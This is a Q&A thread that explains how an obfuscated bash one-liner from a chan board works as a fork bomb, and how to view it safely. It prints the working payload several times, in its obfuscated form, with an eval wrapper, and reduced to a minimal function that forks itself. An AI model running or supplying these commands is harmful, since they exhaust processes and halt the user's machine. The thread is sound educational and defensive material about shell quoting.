# How and why is this string of text a fork bomb?

Tags: shell, malware, encoding, forking

Found on a random chan board:

```
echo "I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==" | uudecode
```

Somehow running this this results in an infinitely spawning process that runs rampant and grinds the machine to a halt. I see something about "su" attempting to be executed numerous times.

..which is strange, because I'd just expect text to be output, not the execution of anything.

Running this text through an online decoder just gives me a batch of binary spew:

[image: uudecode result]

What is this mess of text actually doing, and is there a way to "safely" view it?

Comment: Why is "su" being executed numerous times?

Comment: A piece of advice: don't run code from random chan boards and be grateful it was just  a fork bomb.

Comment: Heh. Thankfully I was on a snapshotted VM made for the express purpose of playing around with possibly hostile garbage like this.

Comment: I know this is off-topic, but is it possible to mention the board and the context in which the command was mentioned?

Comment: @Sebi - https://archive.rebeccablacktech.com/g/thread/45564403

Comment: Vidar Holen, the author of https://www.shellcheck.net/ wrote a [blog post](https://www.vidarholen.net/contents/blog/?p=766) on this in which he claims to be the author of this fork bomb and gives some background information.

Answer (score 219, accepted):

First, let's look at the whole command:

```
echo "I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==" | uudecode
```

It contains a double-quoted string that gets echoed to `uudecode`.  But, note that, within the double-quoted string is a *back-quoted* string.  This string gets **executed**.  The string is:

```
`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`
```

If we look at what's in it, we see three commands:

```
rYWdl &
r()(Y29j & r{,3Rl7Ig} & r{,T31wo})
r
```

Performing *brace expansion* on the middle command, we have:

```
rYWdl &
r()(Y29j & r r3Rl7Ig & r rT31wo)
r
```

The first line tries to run a nonsense command in background.  This is unimportant.

The second line is important: it defines a function `r` which, when run, launches two copies of itself.  Each of those copies would, of course, launch two more copies.  And so on.

The third line runs `r`, starting the fork bomb.

The rest of the code, outside of the back-quoted string, is just nonsense for obfuscation.

#### How to run the command *safely*

This code can be run safely if we set limit on function nesting level.  This can be done with bash's `FUNCNEST` variable.  Here, we set it to `2` and this stops the recursion:

```
$ export FUNCNEST=2
$ echo "I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==" | uudecode
bash: rYWdl: command not found
bash: Y29j: command not found
bash: r: maximum function nesting level exceeded (2)
bash: r: maximum function nesting level exceeded (2)
bash: r: maximum function nesting level exceeded (2)
bash: Y29j: command not found
bash: r: maximum function nesting level exceeded (2)
bash: Y29j: command not found
uudecode fatal error:
standard input: Invalid or missing 'begin' line
```

The error messages above show that (a) the nonsense commands `rYWdl` and `Y29j` are not found, (b) the fork bomb gets repeatedly stopped by FUNCNEST, and (c) the output of `echo` does not start with `begin` and, consequently, is not valid input for `uudecode`.

#### The fork bomb in its simplest form

What would the fork bomb look like if we removed the obscuration?  As njzk2 and gerrit suggest, it would look like:

```
echo "`r()(r&r);r`"
```

We can simplify that even further:

```
r()(r&r); r
```

That consists of two statements: one defines the fork-bomb-function `r` and the second runs `r`.

All the other code, including the pipe to `uudecode`, was there just for obscuration and misdirection.

#### The original form had yet another layer of misdirection

The OP has provided [a link](https://archive.rebeccablacktech.com/g/thread/45564403) to the chann board discussion on which this code appeared.  As presented there, the code looked like:

```
eval $(echo "I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==" | uudecode)
```

Notice one of the first comments about this code:

> I fell for it. Copied only the part that echoes and decodes, but still
>   got forkbombed

In the form on the chann board, one would naively think that the problem would be the `eval` statement operating on the output of `uudecode`.  This would lead one to think that removing `eval` would solve the problem.  As we have seen above, this is false and dangerously so.

Comment: Devious! I never thought to consider shell globbing/expansion in the middle of the echoed string.

Comment: I think it would be good to note that `uudecode` is completely irrelevant here.  For a moment I thought `uudecode` was performing back-quoted string interpolation which would render it fundamentally unsafe, but the fork bomb happens before uudecode starts at all.

Comment: ...and *this*, ladies and gentleman, is why security in shell scripts is so damned hard. Even totally harmless-looking stuff can kill you. (Imagine if this was user input from somewhere...)

Comment: @MathematicalOrchid It actually takes nontrivial effort to cause backquoted stuff in user input to a shell script to get executed. And if you're _constructing_ a shell script from user input you should know better than to put it in double quotes.

Comment: @Random832 It depends on how much of a clue the person who wrote the script has. :-/ If you're just taking your first steps with shell scripting... there are many, many ways to shoot yourself in the foot.

Comment: so, in its simplest form, it would be something like `echo "\`r()(r r);r\`"`?

Comment: @njzk2 You still need an `&` there: `echo "\`r()(r&r);r\`"`.

Comment: @gerrit thanks. That looked odd without the `&`. I guess the obfuscation part worked on me.

Comment: I didn't know what back ticks did in shell and found a related link: http://unix.stackexchange.com/a/27432

Comment: @MathematicalOrchid I think Random832's point is that the backtick expansion doesn't happen recursively. If you do `echo $userinput`, and the input contains backticks, it won't execute the code in them. The only expansion done when expanding a variable is globbing and word splitting (and these will be suppressed if you put the variable in double quotes).

Comment: Indeed. echo "$uservariable" doesn't perform backtick expansion if uservariable contains backticks.

Comment: @MathematicalOrchid, unless you're doing something silly like running `eval` (or a moral equivalent such as `sh -c` or `ssh "$host" "some_command $untrusted_user_data"`) on a string containing user input that wasn't sanitized with `printf %q`, it's perfectly safe. Indeed, many common mistakes in shell programming come from people not understanding the rules built to protect from jumps back to earlier points in the parsing process.

Comment: So to clarify, nothing in this matters other than the backquoted string? In other words if you were to run `echo \`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r\`` it would have the same result?

Answer (score 11):

To answer the second part of your question:

> ...is there a way to "safely" view it?

To defuse this string,
replace the outer double quotes by single quotes and escape the single quotes occurring inside the string.  Like this, the shell will not execute any code, and you're actually passing everything straight to `uudecode`:

```
$ echo 'I<RA('\''1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;=='
I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==
$ echo 'I<RA('\''1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==' | uudecode
uudecode fatal error:
standard input: Invalid or missing 'begin' line
```

Other alternatives are noted in the comments:

[kasperd suggested](https://superuser.com/questions/996795/how-and-why-is-this-string-of-text-a-fork-bomb#comment1376997_996879):

```
$ uudecode
I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==
[press <Ctrl>+D]
uudecode fatal error:
standard input: Invalid or missing 'begin' line
```

[Jacob Krall suggested](https://superuser.com/questions/996795/how-and-why-is-this-string-of-text-a-fork-bomb#comment1377012_996879) to use a text editor, paste the contents, then pass that file to uudecode.

Comment: Alternatively: Type `uudecode` on the command line. Press enter. Copy-paste the string to be decoded.

Comment: Another alternative: use a text editor to save the contents to a file. Open that file with `uudecode`.

Comment: Thanks to both, I have noted those alternatives in the answer.

Comment: Make sure you check that the string isn't something like ``echo "foo`die`bar'`die`'baz"`` first! That is, if it has any `'`s in it then replacing the quotes with single quotes will not be sufficient.

Answer (score 7):

At a first glance, you might think that *output to the shell will never get executed*. This is *still true*. The problem is already in the *input*. The main trick here is what programmers call [operator precedence](https://en.wikipedia.org/wiki/Order_of_operations). This is the order the shell tries to process your input:

```
1.       "                                                             "
2.                     rYWdl
3.                          &
4.                           r()(Y29j&r{,3Rl7Ig}&r{,T31wo})             
5.                                                         ;            
6.                                                          r           
7.                    `                                      `          
8.        I<RA('1E<W3t                                        26<F]F;== 
9.  echo                                                                
10.                                                                      |         
11.                                                                        uudecode
```

1. Compose the string by executing all backticks commands inside it.
2. Usually an unknown command, which would cause some output like *If 'rYWdl' is not a typo you can use command-not-found to lookup the package that contains it …* (depends on the system)
3. Executes 2. in the background. You will never see an output.
4. Define the fork bomb function.
5. Command separator.
6. Run the fork bomb.
7. Insert the result of 6. into the String. *(We never come here.)*

The error is to think that `echo` would be the first command to be executed, `uudecode` the second. Both of them will never be reached.

**Conclusion:** Double quotes are always dangerous on the shell.

Comment: Very late, but the first sentence is wrong when you use escape sequences